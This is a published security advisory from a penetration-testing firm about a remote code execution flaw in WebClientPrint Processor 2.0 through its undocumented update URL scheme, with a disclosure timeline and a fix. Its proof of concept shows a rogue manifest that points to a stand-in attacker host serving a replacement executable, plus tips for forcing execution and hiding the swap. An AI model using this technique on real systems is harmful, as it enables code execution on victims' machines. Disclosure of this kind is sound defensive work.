Advisory: WebClientPrint Processor 2.0: Remote Code Execution via Updates RedTeam Pentesting discovered that rogue updates trigger a remote code execution vulnerability in WebClientPrint Processor (WCPP). These updates may be distributed through specially crafted websites and are processed without any user interaction as soon as the website is accessed. However, the browser must run with administrative privileges. ### Details - Product: Neodynamic WebClientPrint Processor - Affected Versions: 2.0.15.109 (Microsoft Windows) - Fixed Versions: \>= 2.0.15.910 - Vulnerability Type: Remote Code Execution - Security Risk: low - Vendor URL: `http://www.neodynamic.com/` - Vendor Status: fixed version released - Advisory URL: `https://www.redteam-pentesting.de/advisories/rt-sa-2015-009` - Advisory Status: published - CVE: GENERIC-MAP-NOMATCH - CVE URL: `https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH` ### Introduction Neodynamic's WebClientPrint Processor is a client-side application, which allows server-side applications to print documents on a client's printer without user interaction, bypassing the browser's print functionality. The server-side application may be written in ASP.NET or PHP while on the client-side multiple platforms and browsers are supported. "Send raw data, text and native commands to client printers without showing or displaying any print dialog box!" (Neodynamic's website) ### More Details Upon installation under Microsoft Windows, WCPP registers itself as a handler for the "webclientprint" URL scheme. Thus, any URL starting with "webclientprint:" is handled by WCPP. For example, entering `webclientprint:-about` in the URL bar of a browser opens the about box of WCPP. During RedTeam Pentesting's investigation it turned out that WCPP supports an undocumented update mechanism. Through the following URL the update mechanism is triggered: `webclientprint:-update:http://legitimate.example.com/somedir/manifest.xml` This instructs WCPP to fetch the file "manifest.xml" from the "legitimate.example.com" host. Furthermore, it was found that an XML file of the following structure is expected: ``` 5.0.0 http://legitimate.example.com/somedir/wcpp.exe ``` Next, the XML file is parsed and the updated version of WCPP is fetched from the URL `http://legitimate.example.com/somedir/wcpp.exe` with the returned byte stream being written to `C:Program Files (x86)NeodynamicWCPP for Windowsv2.0wcpp.exe` on a Windows 7 x86_64 machine. For the write process to succeed, elevated or administrative privileges are required. Thus, the browser which invokes WCPP must run with elevated or administrative privileges. ### Proof of Concept An attacker may prepare a malicious website containing the following HTML code: ``` ``` Furthermore, the attacker can provide a rogue manifest.xml as follows: ``` 5.0.0 http://attack.example.com/somedir/wcpp.exe ``` Finally, arbitrary code may be placed at the AppUrl URL: `http://attack.example.com/somedir/wcpp.exe` If the malicious website is visited by a WCPP user, the WCPP handler (wcpp.exe) of the user's machine is replaced by code arbitrarily chosen by the attacker. A visual indication of the update progress is displayed and the success is indicated through a message box. However, successful exploitation requires no user interaction. Any subsequent invocation of an arbitrary webclientprint URL will result in the execution of the attacker's code. Thus, the attacker may deliver a second inline frame containing a webclientprint URL in order to force immediate execution of the attacker's code. ### Workaround Affected users should disable the WCPP handler and upgrade to a fixed version as soon as possible. ### Fix Install a WCPP version greater or equal to 2.0.15.910 (). ### Security Risk If a WCPP user visits an attacker-controlled website, the attacker may execute arbitrary code on the machine of the victim user. However, successful exploitation is only possible if the browser is running with elevated or administrative privileges. On modern Microsoft Windows systems, this is a rather strong prerequisite. Furthermore, the update process is indicated on the user's screen, potentially causing suspicion. If successful, the attacker gains administrative privileges as well. A skilful attacker may restore the original WCPP immediately while migrating the malicious code to another place. This way, WCPP functionality would not be disrupted and the attacked users may be tricked to believe that a legitimate update has just occurred. Because of the rarely fulfilled prerequisite of a browser running with elevated or administrative privileges, this vulnerability is estimated to pose a low risk. ### Timeline - 2015-08-24 Vulnerability identified - 2015-09-03 Customer approved disclosure to vendor - 2015-09-04 Asked vendor for security contact - 2015-09-04 CVE number requested - 2015-09-04 Vendor responded with security contact - 2015-09-07 Vendor notified - 2015-09-07 Vendor acknowledged receipt of advisory - 2015-09-15 Vendor released fixed version - 2015-09-16 Customer asked to wait with advisory release until all their clients are updated - 2017-07-31 Customer approved advisory release - 2017-08-22 Advisory released ### RedTeam Pentesting GmbH RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: ### Working at RedTeam Pentesting RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: